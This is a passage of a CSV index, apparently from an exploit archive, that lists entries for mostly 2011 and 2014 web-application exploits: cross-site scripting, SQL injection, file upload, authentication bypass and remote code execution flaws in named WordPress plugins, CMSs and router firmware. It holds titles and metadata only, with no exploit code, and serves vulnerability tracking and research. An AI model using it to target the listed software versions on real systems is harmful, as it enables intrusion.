Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35290,exploits/php/webapps/35290.txt,"SimpGB 1.49.2 - 'Guestbook.php' Multiple Cross-Site Scripting Vulnerabilities",2011-01-26,MustLive,php,webapps, -35251,exploits/php/webapps/35251.txt,"Pixie CMS 1.0.4 - '/admin/index.php' SQL Injection",2011-01-20,"High-Tech Bridge SA",php,webapps, -35253,exploits/php/webapps/35253.txt,"web@all 1.1 - 'url' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35254,exploits/php/webapps/35254.txt,"PivotX 2.2.2 - 'module_image.php' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35255,exploits/php/webapps/35255.txt,"WordPress Plugin Uploader 1.0 - 'num' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps, -35256,exploits/cfm/webapps/35256.txt,"ActiveWeb Professional 3.0 - Arbitrary File Upload",2011-01-25,StenoPlasma,cfm,webapps, -35257,exploits/php/webapps/35257.txt,"WordPress Plugin Videox7 UGC 2.5.3.2 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35258,exploits/php/webapps/35258.txt,"WordPress Plugin Audio 0.5.1 - 'showfile' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps, -35259,exploits/php/webapps/35259.txt,"PivotX 2.2 - '/pivotx/includes/blogroll.php?color' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps, -35260,exploits/php/webapps/35260.txt,"PivotX 2.2 - '/pivotx/includes/timwrapper.php?src' Cross-Site Scripting",2011-01-25,"High-Tech Bridge SA",php,webapps, -35261,exploits/php/webapps/35261.txt,"WordPress Plugin RSS Feed Reader 0.1 - 'rss_url' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps, -35262,exploits/php/webapps/35262.txt,"WordPress Plugin WP Featured Post with Thumbnail 3.0 - 'src' Cross-Site Scripting",2011-01-23,"AutoSec Tools",php,webapps, -35263,exploits/php/webapps/35263.txt,"WordPress Plugin WP Publication Archive 2.0.1 - 'file' Information Disclosure",2011-01-23,"AutoSec Tools",php,webapps, -35264,exploits/php/webapps/35264.txt,"WordPress Plugin Featured Content 0.0.1 - 'listid' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35265,exploits/php/webapps/35265.php,"WordPress Plugin Recip.ly 1.1.7 - 'uploadImage.php' Arbitrary File Upload",2011-01-25,"AutoSec Tools",php,webapps, -35266,exploits/php/webapps/35266.txt,"MyBB Forums 1.8.2 - Persistent Cross-Site Scripting",2014-11-17,"Avinash Thapa",php,webapps, -35272,exploits/hardware/webapps/35272.txt,"ZTE ZXHN H108L - Authentication Bypass (1)",2014-11-17,"Project Zero Labs",hardware,webapps, -35271,exploits/php/webapps/35271.txt,"Maarch LetterBox 2.8 - (Authentication Bypass) Insecure Cookies",2014-11-17,"ZoRLu Bugrahan",php,webapps, -35285,exploits/php/webapps/35285.txt,"WordPress Plugin Feature Slideshow 1.0.6 - 'src' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps, -35286,exploits/php/webapps/35286.txt,"WordPress Plugin BezahlCode Generator 1.0 - 'gen_name' Cross-Site Scripting",2011-01-25,"AutoSec Tools",php,webapps, -35287,exploits/php/webapps/35287.txt,"WordPress Plugin Powerhouse Museum Collection Image Grid 0.9.1.1 - 'tbpv_username' Cross-Site Scripting",2011-01-24,"AutoSec Tools",php,webapps, -35274,exploits/php/webapps/35274.txt,"PHPFox - Persistent Cross-Site Scripting",2014-11-17,spyk2r,php,webapps,80 -35275,exploits/xml/webapps/35275.txt,"Proticaret E-Commerce Script 3.0 - SQL Injection (2)",2014-11-17,"BGA Security",xml,webapps,80 -35276,exploits/hardware/webapps/35276.txt,"ZTE ZXHN H108L - Authentication Bypass (2)",2014-11-17,"Project Zero Labs",hardware,webapps,80 -35277,exploits/php/webapps/35277.txt,"WebsiteBaker 2.8.3 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35278,exploits/php/webapps/35278.txt,"Zoph 0.9.1 - Multiple Vulnerabilities",2014-11-17,"Manuel García Cárdenas",php,webapps,80 -35294,exploits/php/webapps/35294.txt,"Joomla! Component com_clan_members - 'id' SQL Injection",2011-02-01,FL0RiX,php,webapps, -35300,exploits/php/webapps/35300.txt,"WordPress Plugin TagNinja 1.0 - 'id' Cross-Site Scripting",2011-02-01,"AutoSec Tools",php,webapps, -35301,exploits/php/webapps/35301.html,"Snowfox CMS 1.0 - Cross-Site Request Forgery (Add Admin)",2014-11-19,LiquidWorm,php,webapps,80 -35303,exploits/php/webapps/35303.txt,"WordPress Plugin Paid Memberships Pro 1.7.14.2 - Directory Traversal",2014-11-19,"Kacper Szurek",php,webapps,80 -35305,exploits/php/webapps/35305.txt,"ACollab - 't' SQL Injection",2011-02-01,"AutoSec Tools",php,webapps, -35306,exploits/php/webapps/35306.txt,"TCExam 11.1.16 - 'user_password' Cross-Site Scripting",2011-02-02,"AutoSec Tools",php,webapps, -35307,exploits/php/webapps/35307.py,"All In One Control Panel 1.4.1 - 'cp_menu_data_file.php' SQL Injection",2011-01-31,"AutoSec Tools",php,webapps, -35309,exploits/php/webapps/35309.txt,"Betsy 4.0 - 'page' Local File Inclusion",2011-02-02,MizoZ,php,webapps, -35310,exploits/asp/webapps/35310.txt,"Web Wiz Forums 9.5 - Multiple SQL Injections",2011-03-23,eXeSoul,asp,webapps, -35311,exploits/php/webapps/35311.txt,"Octeth Oempro 3.6.4 - SQL Injection / Information Disclosure",2011-02-03,"Ignacio Garrido",php,webapps, -35312,exploits/php/webapps/35312.txt,"Firebook - 'index.html' Cross-Site Scripting",2011-02-03,MustLive,php,webapps, -35567,exploits/php/webapps/35567.txt,"Eleanor CMS - Cross-Site Scripting / Multiple SQL Injections",2011-04-05,"High-Tech Bridge SA",php,webapps, -35568,exploits/php/webapps/35568.txt,"UseBB 1.0.11 - 'admin.php' Local File Inclusion",2011-04-05,"High-Tech Bridge SA",php,webapps, -35315,exploits/php/webapps/35315.txt,"Escortservice 1.0 - 'custid' SQL Injection",2011-02-07,NoNameMT,php,webapps, -35319,exploits/php/webapps/35319.txt,"WebAsyst Shop-Script - Cross-Site Scripting / HTML Injection",2011-02-08,"High-Tech Bridge SA",php,webapps, -35320,exploits/php/webapps/35320.txt,"ViArt Shop 4.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps, -35381,exploits/php/webapps/35381.txt,"xEpan 1.0.1 - Cross-Site Request Forgery",2014-11-26,"High-Tech Bridge SA",php,webapps,80 -35323,exploits/php/webapps/35323.md,"MyBB 1.8.2 - 'unset_globals()' Function Bypass / Remote Code Execution",2014-11-22,"Taoguang Chen",php,webapps, -35324,exploits/php/webapps/35324.txt,"WordPress Plugin CM Download Manager 2.0.0 - Code Injection",2014-11-22,"Phi Ngoc Le",php,webapps, -35325,exploits/hardware/webapps/35325.txt,"NETGEAR WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access",2014-11-22,LiquidWorm,hardware,webapps, -35327,exploits/php/webapps/35327.txt,"CiviCRM 3.3.3 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"AutoSec Tools",php,webapps, -35328,exploits/php/webapps/35328.txt,"UMI CMS 2.8.1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-08,"High-Tech Bridge SA",php,webapps, -35329,exploits/php/webapps/35329.txt,"PHPXref 0.7 - 'nav.html' Cross-Site Scripting",2011-02-09,MustLive,php,webapps, -35330,exploits/php/webapps/35330.txt,"ManageEngine ADSelfService Plus 4.4 - POST Manipulation Security Question",2011-02-10,"Core Security",php,webapps, -35331,exploits/php/webapps/35331.txt,"ManageEngine ADSelfService Plus 4.4 - 'EmployeeSearch.cc' Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"Core Security",php,webapps, -35332,exploits/php/webapps/35332.txt,"Dolphin 7.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-10,"AutoSec Tools",php,webapps, -35333,exploits/php/webapps/35333.py,"webERP 4.0.1 - 'InputSerialItemsFile.php' Arbitrary File Upload",2011-02-10,"AutoSec Tools",php,webapps, -35334,exploits/php/webapps/35334.txt,"RunCMS 2.2.2 - 'register.php' SQL Injection",2011-02-10,"High-Tech Bridge SA",php,webapps, -35335,exploits/php/webapps/35335.html,"Drupal Module CAPTCHA - Security Bypass",2011-02-11,anonymous,php,webapps, -35336,exploits/php/webapps/35336.txt,"TaskFreak! 0.6.4 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps, -35337,exploits/php/webapps/35337.txt,"TaskFreak! 0.6.4 - 'print_list.php' Multiple Cross-Site Scripting Vulnerabilities",2011-02-12,LiquidWorm,php,webapps, -35338,exploits/php/webapps/35338.txt,"TaskFreak! 0.6.4 - 'rss.php' HTTP Referer Header Cross-Site Scripting",2011-02-12,LiquidWorm,php,webapps, -35340,exploits/php/webapps/35340.txt,"WordPress Plugin wpDataTables 1.5.3 - SQL Injection",2014-11-24,"Claudio Viviani",php,webapps, -35341,exploits/php/webapps/35341.py,"WordPress Plugin wpDataTables 1.5.3 - Unauthenticated Arbitrary File Upload",2014-11-24,"Claudio Viviani",php,webapps, -35343,exploits/php/webapps/35343.txt,"Smarty Template Engine 2.6.9 - '$smarty.template' PHP Code Injection",2011-02-09,jonieske,php,webapps, -35344,exploits/php/webapps/35344.txt,"RobotStats 1.0 - 'robot' SQL Injection",2014-11-24,"ZoRLu Bugrahan",php,webapps, -35346,exploits/php/webapps/35346.txt,"WordPress Plugin DukaPress 2.5.2 - Directory Traversal",2014-11-24,"Kacper Szurek",php,webapps, -35347,exploits/php/webapps/35347.txt,"Dokeos 1.8.6 2 - 'style' Cross-Site Scripting",2011-02-12,"AutoSec Tools",php,webapps, -35348,exploits/php/webapps/35348.txt,"MG2 0.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,LiquidWorm,php,webapps, -35349,exploits/php/webapps/35349.txt,"Gollos 2.8 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps, -35350,exploits/php/webapps/35350.txt,"Wikipad 1.6.0 - Cross-Site Scripting / HTML Injection / Information Disclosure",2011-02-15,"High-Tech Bridge SA",php,webapps, -35351,exploits/php/webapps/35351.txt,"Photopad 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-02-15,"High-Tech Bridge SA",php,webapps, -35353,exploits/php/webapps/35353.txt,"Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload",2011-02-15,"s3rg3770 & Chuzz",php,webapps, -35357,exploits/cgi/webapps/35357.txt,"Advantech EKI-6340 - Command Injection",2014-11-24,"Core Security",cgi,webapps,80 -35360,exploits/php/webapps/35360.txt,"WSN Guest 1.24 - 'wsnuser' Cookie SQL Injection",2011-02-18,"Aliaksandr Hartsuyeu",php,webapps, -35362,exploits/php/webapps/35362.txt,"Batavi 1.0 - Multiple Local File Inclusion / Cross-Site Scripting Vulnerabilities",2011-02-21,"AutoSec Tools",php,webapps, -35365,exploits/php/webapps/35365.py,"PHPMyRecipes 1.2.2 - 'dosearch.php?words_exact' SQL Injection",2014-11-25,bard,php,webapps,80 -35367,exploits/php/webapps/35367.txt,"Crea8Social 1.3 - Persistent Cross-Site Scripting",2014-11-25,"Halil Dalabasmaz",php,webapps,80 -35371,exploits/php/webapps/35371.txt,"WordPress Plugin Google Document Embedder 2.5.14 - SQL Injection",2014-11-25,"Kacper Szurek",php,webapps,80 -35372,exploits/hardware/webapps/35372.rb,"Arris VAP2500 - Authentication Bypass",2014-11-25,HeadlessZeke,hardware,webapps,80 -35373,exploits/php/webapps/35373.txt,"WordPress Plugin GD Star Rating 1.9.7 - 'wpfn' Cross-Site Scripting",2011-02-22,"High-Tech Bridge SA",php,webapps, -35374,exploits/php/webapps/35374.txt,"IBM Lotus Sametime Server 8.0 - 'stcenter.nsf' Cross-Site Scripting",2011-02-22,andrew,php,webapps, -35375,exploits/php/webapps/35375.txt,"Vanilla Forums 2.0.17.x - 'p' Cross-Site Scripting",2011-02-22,"Aung Khant",php,webapps, -35376,exploits/php/webapps/35376.txt,"mySeatXT 0.164 - 'lang' Local File Inclusion",2011-02-16,"AutoSec Tools",php,webapps, -35378,exploits/php/webapps/35378.txt,"WordPress Plugin DB Backup - Arbitrary File Download",2014-11-26,"Ashiyane Digital Security Team",php,webapps,80 -35383,exploits/cgi/webapps/35383.rb,"Device42 WAN Emulator 2.3 - Traceroute Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 -35384,exploits/cgi/webapps/35384.rb,"Device42 WAN Emulator 2.3 - Ping Command Injection (Metasploit)",2014-11-26,"Brandon Perry",cgi,webapps,80 -35385,exploits/php/webapps/35385.pl,"WordPress Plugin Slider REvolution 3.0.95 / Showbiz Pro 1.7.1 - Arbitrary File Upload",2014-11-26,"Simo Ben Youssef",php,webapps,80 -35387,exploits/php/webapps/35387.txt,"phpShop 0.8.1 - 'page' Cross-Site Scripting",2011-02-25,"Aung Khant",php,webapps, -35391,exploits/php/webapps/35391.txt,"glFusion 1.1.x/1.2.1 - 'users.php' SQL Injection",2011-02-25,H3X,php,webapps, -35392,exploits/php/webapps/35392.txt,"WordPress Plugin IGIT Posts Slider Widget 1.0 - 'src' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps, -35393,exploits/php/webapps/35393.txt,"WordPress Plugin ComicPress Manager 1.4.9 - 'lang' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps, -35394,exploits/php/webapps/35394.txt,"WordPress Plugin YT-Audio 1.7 - 'v' Cross-Site Scripting",2011-02-23,"AutoSec Tools",php,webapps, -35396,exploits/php/webapps/35396.txt,"xEpan 1.0.4 - Multiple Vulnerabilities",2014-11-28,"Parikesit _ Kurawa",php,webapps, -35397,exploits/php/webapps/35397.txt,"Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting",2011-02-23,MustLive,php,webapps, -35400,exploits/php/webapps/35400.txt,"WordPress Plugin BackWPup 1.4 - Multiple Information Disclosure Vulnerabilities",2011-02-28,"Danilo Massa",php,webapps, -35401,exploits/php/webapps/35401.txt,"SnapProof - 'retPageID' Cross-Site Scripting",2011-02-28,"difficult 511",php,webapps, -35402,exploits/php/webapps/35402.txt,"Forritun - Multiple SQL Injections",2011-03-02,eXeSoul,php,webapps, -35405,exploits/php/webapps/35405.txt,"VidiScript - 'vp' Cross-Site Scripting",2011-03-02,NassRawI,php,webapps, -35406,exploits/php/webapps/35406.txt,"Support Incident Tracker (SiT!) 3.62 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps, -35407,exploits/php/webapps/35407.txt,"phpWebSite 1.7.1 - 'local' Cross-Site Scripting",2011-03-03,"AutoSec Tools",php,webapps, -35408,exploits/php/webapps/35408.txt,"xtcModified 1.05 - Multiple HTML Injection / Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps, -35409,exploits/php/webapps/35409.txt,"Pragyan CMS 3.0 Beta - Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"High-Tech Bridge SA",php,webapps, -35410,exploits/windows/webapps/35410.py,"InterPhoto Image Gallery 2.4.2 - 'IPLANG' Local File Inclusion",2011-03-04,"AutoSec Tools",windows,webapps, -35411,exploits/asp/webapps/35411.txt,"Kodak InSite 5.5.2 - '/Troubleshooting/DiagnosticReport.asp?HeaderWarning' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps, -35412,exploits/asp/webapps/35412.txt,"Kodak InSite 5.5.2 - '/Pages/login.aspx?Language' Cross-Site Scripting",2011-03-07,Dionach,asp,webapps, -35416,exploits/php/webapps/35416.txt,"Interleave 5.5.0.2 - 'basicstats.php' Multiple Cross-Site Scripting Vulnerabilities",2011-03-03,"AutoSec Tools",php,webapps, -35417,exploits/php/webapps/35417.php,"WS Interactive Automne 4.1 - '/admin/upload-controler.php' Arbitrary File Upload",2011-03-08,"AutoSec Tools",php,webapps, -35418,exploits/php/webapps/35418.txt,"WordPress Plugin Inline Gallery 0.3.9 - 'do' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps, -35419,exploits/hardware/webapps/35419.txt,"Prolink PRN2001 - Multiple Vulnerabilities",2014-12-02,"Herman Groeneveld",hardware,webapps, -35424,exploits/php/webapps/35424.py,"ProjectSend r-561 - Arbitrary File Upload",2014-12-02,"Fady Mohammed Osman",php,webapps, -36125,exploits/php/webapps/36125.txt,"Piwigo 2.7.3 - SQL Injection",2015-02-19,"Sven Schleier",php,webapps,80 -35428,exploits/php/webapps/35428.txt,"SQL Buddy 1.3.3 - Remote Code Execution",2014-12-02,"Fady Mohammed Osman",php,webapps, -35429,exploits/php/webapps/35429.txt,"WordPress Plugin PhotoSmash Galleries 1.0.x - 'action' Cross-Site Scripting",2011-03-08,"High-Tech Bridge SA",php,webapps, -35430,exploits/php/webapps/35430.txt,"WordPress Plugin 1 Flash Gallery 0.2.5 - Cross-Site Scripting / SQL Injection",2011-03-08,"High-Tech Bridge SA",php,webapps, -35431,exploits/php/webapps/35431.txt,"Ruubikcms 1.0.3 - 'head.php' Cross-Site Scripting",2011-03-08,"Khashayar Fereidani",php,webapps, -35435,exploits/php/webapps/35435.txt,"WordPress Plugin Lazyest Gallery 1.0.26 - 'image' Cross-Site Scripting",2011-03-10,"High-Tech Bridge SA",php,webapps, -35436,exploits/php/webapps/35436.txt,"Xinha 0.96 - 'spell-check-savedicts.php' Multiple HTML Injection Vulnerabilities",2011-03-10,"John Leitch",php,webapps, -35438,exploits/cgi/webapps/35438.txt,"Cosmoshop 10.05.00 - Multiple Cross-Site Scripting / SQL Injections",2011-03-10,"High-Tech Bridge SA",cgi,webapps, -35439,exploits/php/webapps/35439.txt,"WordPress Plugin Nextend Facebook Connect 1.4.59 - Cross-Site Scripting",2014-12-02,"Kacper Szurek",php,webapps,80 -35442,exploits/hardware/webapps/35442.txt,"EntryPass N5200 - Credentials Exposure",2014-12-02,"RedTeam Pentesting",hardware,webapps, -35443,exploits/php/webapps/35443.txt,"TYPO3 Extension ke DomPDF - Remote Code Execution",2014-12-02,"RedTeam Pentesting",php,webapps,80 -35444,exploits/php/webapps/35444.txt,"Lms Web Ensino - Multiple Input Validation Vulnerabilities",2011-03-04,waKKu,php,webapps, -35447,exploits/php/webapps/35447.txt,"WordPress Plugin Google Document Embedder 2.5.16 - mysql_real_escpae_string Bypass SQL Injection",2014-12-03,"Securely (Yoo Hee man)",php,webapps, -35451,exploits/php/webapps/35451.txt,"BoutikOne - 'categorie.php?path' SQL Injection",2011-03-14,cdx.security,php,webapps, -35452,exploits/php/webapps/35452.txt,"BoutikOne - 'list.php?path' SQL Injection",2011-03-14,cdx.security,php,webapps, -35453,exploits/php/webapps/35453.txt,"BoutikOne - 'search.php' Multiple SQL Injections",2011-03-14,cdx.security,php,webapps, -35454,exploits/php/webapps/35454.txt,"BoutikOne - 'rss_news.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps, -35455,exploits/php/webapps/35455.txt,"BoutikOne - 'rss_flash.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps, -35456,exploits/php/webapps/35456.txt,"BoutikOne - 'rss_promo.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps, -35457,exploits/php/webapps/35457.txt,"BoutikOne - 'rss_top10.php?lang' SQL Injection",2011-03-14,cdx.security,php,webapps, -35459,exploits/php/webapps/35459.txt,"WordPress Plugin Cart66 Lite eCommerce 1.5.1.17 - Blind SQL Injection",2014-12-03,"Kacper Szurek",php,webapps,80 -35460,exploits/php/webapps/35460.txt,"WordPress Plugin CodeArt Google MP3 Player - File Disclosure Download",2014-12-03,"QK14 Team",php,webapps,80 -35564,exploits/php/webapps/35564.txt,"DoceboLms 4.0.4 - 'index.php' Multiple HTML Injection Vulnerabilities",2011-04-03,LiquidWorm,php,webapps, -35565,exploits/php/webapps/35565.txt,"Gazelle CMS 1.0 - Cross-Site Scripting / SQL Injection",2011-04-04,"kurdish hackers team",php,webapps, -35462,exploits/hardware/webapps/35462.txt,"Technicolor DT5130 2.05.C29GV - Multiple Vulnerabilities",2014-12-04,Crash,hardware,webapps,80 -35463,exploits/cgi/webapps/35463.txt,"Advertise With Pleasure! (AWP) 6.6 - SQL Injection",2014-12-04,"Robert Cooper",cgi,webapps,80 -35467,exploits/php/webapps/35467.txt,"SugarCRM 6.1.1 - Information Disclosure",2011-03-15,"RedTeam Pentesting GmbH",php,webapps, -35469,exploits/php/webapps/35469.txt,"Wikiwig 5.01 - Cross-Site Scripting / HTML Injection",2011-03-10,"AutoSec Tools",php,webapps, -35470,exploits/php/webapps/35470.txt,"AplikaMedia CMS - 'page_info.php' SQL Injection",2011-03-16,H3X,php,webapps, -35473,exploits/php/webapps/35473.txt,"PBBoard CMS 3.0.1 - SQL Injection",2014-12-05,"Tran Dinh Tien",php,webapps,80 -35475,exploits/php/webapps/35475.txt,"WordPress Plugin Sodahead Polls 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"High-Tech Bridge SA",php,webapps, -35476,exploits/php/webapps/35476.txt,"WordPress Plugin Rating-Widget 1.3.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-17,"Todor Donev",php,webapps, -35477,exploits/php/webapps/35477.txt,"XOOPS 2.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-18,"Aung Khant",php,webapps, -35479,exploits/php/webapps/35479.txt,"Web Poll Pro 1.0.3 - 'error' HTML Injection",2011-03-19,Hector.x90,php,webapps, -35480,exploits/php/webapps/35480.txt,"Online store PHP script - Multiple Cross-Site Scripting / SQL Injections",2011-03-21,"kurdish hackers team",php,webapps, -35481,exploits/php/webapps/35481.txt,"Newsportal 0.37 - 'post.php' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps, -35482,exploits/php/webapps/35482.txt,"PluggedOut Blog 1.9.9 - 'year' Cross-Site Scripting",2011-03-21,"kurdish hackers team",php,webapps, -35490,exploits/php/webapps/35490.txt,"IceHrm 7.1 - Multiple Vulnerabilities",2014-12-08,LiquidWorm,php,webapps, -35492,exploits/php/webapps/35492.txt,"Free Article Submissions 1.0 - SQL Injection",2014-12-08,BarrabravaZ,php,webapps, -35493,exploits/php/webapps/35493.txt,"WordPress Plugin Ajax Store Locator 1.2 - Arbitrary File Download",2014-12-08,"Claudio Viviani",php,webapps, -35518,exploits/php/webapps/35518.txt,"OpenEMR 4.1.2(7) - Multiple SQL Injections",2014-12-10,Portcullis,php,webapps,80 -35496,exploits/php/webapps/35496.txt,"MC Content Manager 10.1.1 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,MustLive,php,webapps, -35497,exploits/php/webapps/35497.txt,"GrapeCity Data Dynamics Reports 1.6.2084.14 - Multiple Cross-Site Scripting Vulnerabilities",2011-03-24,Dionach,php,webapps, -35498,exploits/php/webapps/35498.txt,"Ripe Website Manager 1.1 - Cross-Site Scripting / Multiple SQL Injections",2011-03-24,"High-Tech Bridge SA",php,webapps, -35499,exploits/php/webapps/35499.txt,"netjukebox 4.01B/5.25 - 'skin' Cross-Site Scripting",2011-03-24,"AutoSec Tools",php,webapps, -35500,exploits/php/webapps/35500.txt,"Family Connections 2.3.2 - 'subject' HTML Injection",2011-03-25,"Zero Science Lab",php,webapps, -35672,exploits/jsp/webapps/35672.txt,"Cisco Unified Communications Manager 8.5 - 'xmldirectorylist.jsp' Multiple SQL Injections",2011-04-27,"Alberto Revelli",jsp,webapps, -35673,exploits/php/webapps/35673.txt,"WordPress Plugin Daily Maui Photo Widget 0.2 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",php,webapps, -35674,exploits/php/webapps/35674.txt,"WordPress Plugin WP Photo Album 1.5.1 - 'id' Cross-Site Scripting",2011-04-28,"High-Tech Bridge SA",php,webapps, -35675,exploits/php/webapps/35675.txt,"Kusaba X 0.9 - Multiple Cross-Site Scripting Vulnerabilities",2011-04-27,"Emilio Pinna",php,webapps, -35676,exploits/cgi/webapps/35676.txt,"BackupPC 3.x - 'index.cgi' Multiple Cross-Site Scripting Vulnerabilities",2011-04-28,"High-Tech Bridge SA",cgi,webapps, -35505,exploits/php/webapps/35505.txt,"WordPress Plugin Symposium 14.10 - SQL Injection",2014-12-09,"Kacper Szurek",php,webapps, -35506,exploits/php/webapps/35506.pl,"Flat Calendar 1.1 - HTML Injection",2014-12-09,"ZoRLu Bugrahan",php,webapps, -35508,exploits/php/webapps/35508.txt,"Cetera eCommerce - Multiple Cross-Site Scripting / SQL Injections",2011-03-27,MustLive,php,webapps, -35510,exploits/php/webapps/35510.txt,"Humhub 0.10.0-rc.1 - SQL Injection",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps, -35511,exploits/php/webapps/35511.txt,"Humhub 0.10.0-rc.1 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-12-10,"Jos Wetzels_ Emiel Florijn",php,webapps, -40817,exploits/java/webapps/40817.txt,"AppFusions Doxygen for Atlassian Confluence 1.3.2 - Cross-Site Scripting",2016-11-22,"Julien Ahrens",java,webapps, -35559,exploits/php/webapps/35559.txt,"MyBB 1.4/1.6 - Multiple Vulnerabilities",2011-04-04,MustLive,php,webapps, -35514,exploits/php/webapps/35514.txt,"OrangeHRM 2.6.2 - 'jobVacancy.php' Cross-Site Scripting",2011-03-27,"AutoSec Tools",php,webapps, -35515,exploits/php/webapps/35515.txt,"Alkacon OpenCMS 7.5.x - Multiple Cross-Site Scripting Vulnerabilities",2011-03-28,antisnatchor,php,webapps, -35516,exploits/php/webapps/35516.txt,"webEdition CMS 6.1.0.2 - 'DOCUMENT_ROOT' Local File Inclusion",2011-03-28,eidelweiss,php,webapps, -35557,exploits/php/webapps/35557.txt,"PHP-Fusion - 'article_id' SQL Injection",2011-04-04,KedAns-Dz,php,webapps, -35520,exploits/php/webapps/35520.txt,"Claroline 1.10 - Multiple HTML Injection Vulnerabilities",2011-03-28,"AutoSec Tools",php,webapps, -35521,exploits/php/webapps/35521.txt,"osCSS 2.1 - Multiple Cross-Site Scripting / Local File Inclusions",2011-03-29,"AutoSec Tools",php,webapps, -35522,exploits/php/webapps/35522.txt,"Spitfire 1.0.3x - 'cms_username' Cross-Site Scripting",2011-03-29,"High-Tech Bridge SA",php,webapps, -35523,exploits/php/webapps/35523.txt,"Tracks 1.7.2 - URI Cross-Site Scripting",2011-03-29,"Mesut Timur",php,webapps, -35524,exploits/php/webapps/35524.txt,"XOOPS - 'view_photos.php' Cross-Site Scripting",2011-03-29,KedAns-Dz,php,webapps, -35525,exploits/php/webapps/35525.txt,"GuppY 4.6.14 - 'lng' Multiple SQL Injections",2011-03-30,"kurdish hackers team",php,webapps, -35526,exploits/php/webapps/35526.txt,"YaCOMAS 0.3.6 OpenCMS - Multiple Cross-Site Scripting Vulnerabilities",2011-03-30,"Pr@fesOr X",php,webapps, -35528,exploits/php/webapps/35528.txt,"GLPI 0.85 - Blind SQL Injection",2014-12-15,"Kacper Szurek",php,webapps, -35529,exploits/windows/webapps/35529.txt,"Soitec SmartEnergy 1.4 - SCADA Login SQL Injection / Authentication Bypass",2014-12-15,LiquidWorm,windows,webapps, -35533,exploits/php/webapps/35533.py,"WordPress Plugin Download Manager 2.7.4 - Remote Code Execution",2014-12-15,"Claudio Viviani",php,webapps, -35548,exploits/php/webapps/35548.txt,"InTerra Blog Machine 1.84 - 'subject' HTML Injection",2011-03-31,"High-Tech Bridge SA",php,webapps, -35535,exploits/php/webapps/35535.php,"PHPads 213607 - Authentication Bypass / Password Change",2014-12-15,"Shaker msallm",php,webapps, -35561,exploits/php/webapps/35561.txt,"WordPress Plugin WPwizz AdWizz Plugin 1.0 - 'link' Cross-Site Scripting",2011-04-04,"John Leitch",php,webapps, -35562,exploits/php/webapps/35562.txt,"WordPress Plugin Placester 0.1 - 'ajax_action' Cross-Site Scripting",2011-04-03,"John Leitch",php,webapps, -35541,exploits/php/webapps/35541.txt,"ResourceSpace 6.4.5976 - Cross-Site Scripting / SQL Injection / Insecure Cookie Handling",2014-12-15,"Adler Freiheit",php,webapps, -35556,exploits/hardware/webapps/35556.txt,"CIK Telecom VoIP Router SVG6000RW - Privilege Escalation / Command Execution",2014-12-17,Chako,hardware,webapps, -35543,exploits/php/webapps/35543.txt,"WordPress Plugin WP Symposium 14.11 - Unauthenticated Arbitrary File Upload",2014-12-15,"Claudio Viviani",php,webapps, -35547,exploits/php/webapps/35547.txt,"ICJobSite 1.1 - 'pid' SQL Injection",2011-03-30,RoAd_KiLlEr,php,webapps, -35550,exploits/php/webapps/35550.txt,"Collabtive 0.6.5 - Multiple Remote Input Validation Vulnerabilities",2011-03-31,"High-Tech Bridge SA",php,webapps, -35551,exploits/php/webapps/35551.txt,"CMS Papoo 6.0.0 Rev. 4701 - Persistent Cross-Site Scripting",2014-12-16,"Steffen Rösemann",php,webapps,80 -35555,exploits/php/webapps/35555.txt,"AWCM 2.x - 'search.php' Cross-Site Scripting",2011-04-01,"Antu Sanadi",php,webapps, -35569,exploits/php/webapps/35569.txt,"XOOPS 2.5 - 'banners.php' Multiple Local File Inclusions",2011-04-04,KedAns-Dz,php,webapps, -35571,exploits/php/webapps/35571.txt,"TextPattern 4.2 - 'index.php' Cross-Site Scripting",2011-04-06,"kurdish hackers team",php,webapps, -35572,exploits/php/webapps/35572.txt,"Redmine 1.0.1/1.1.1 - 'projects/hg-hellowword/news/' Cross-Site Scripting",2011-04-06,"Mesut Timur",php,webapps, 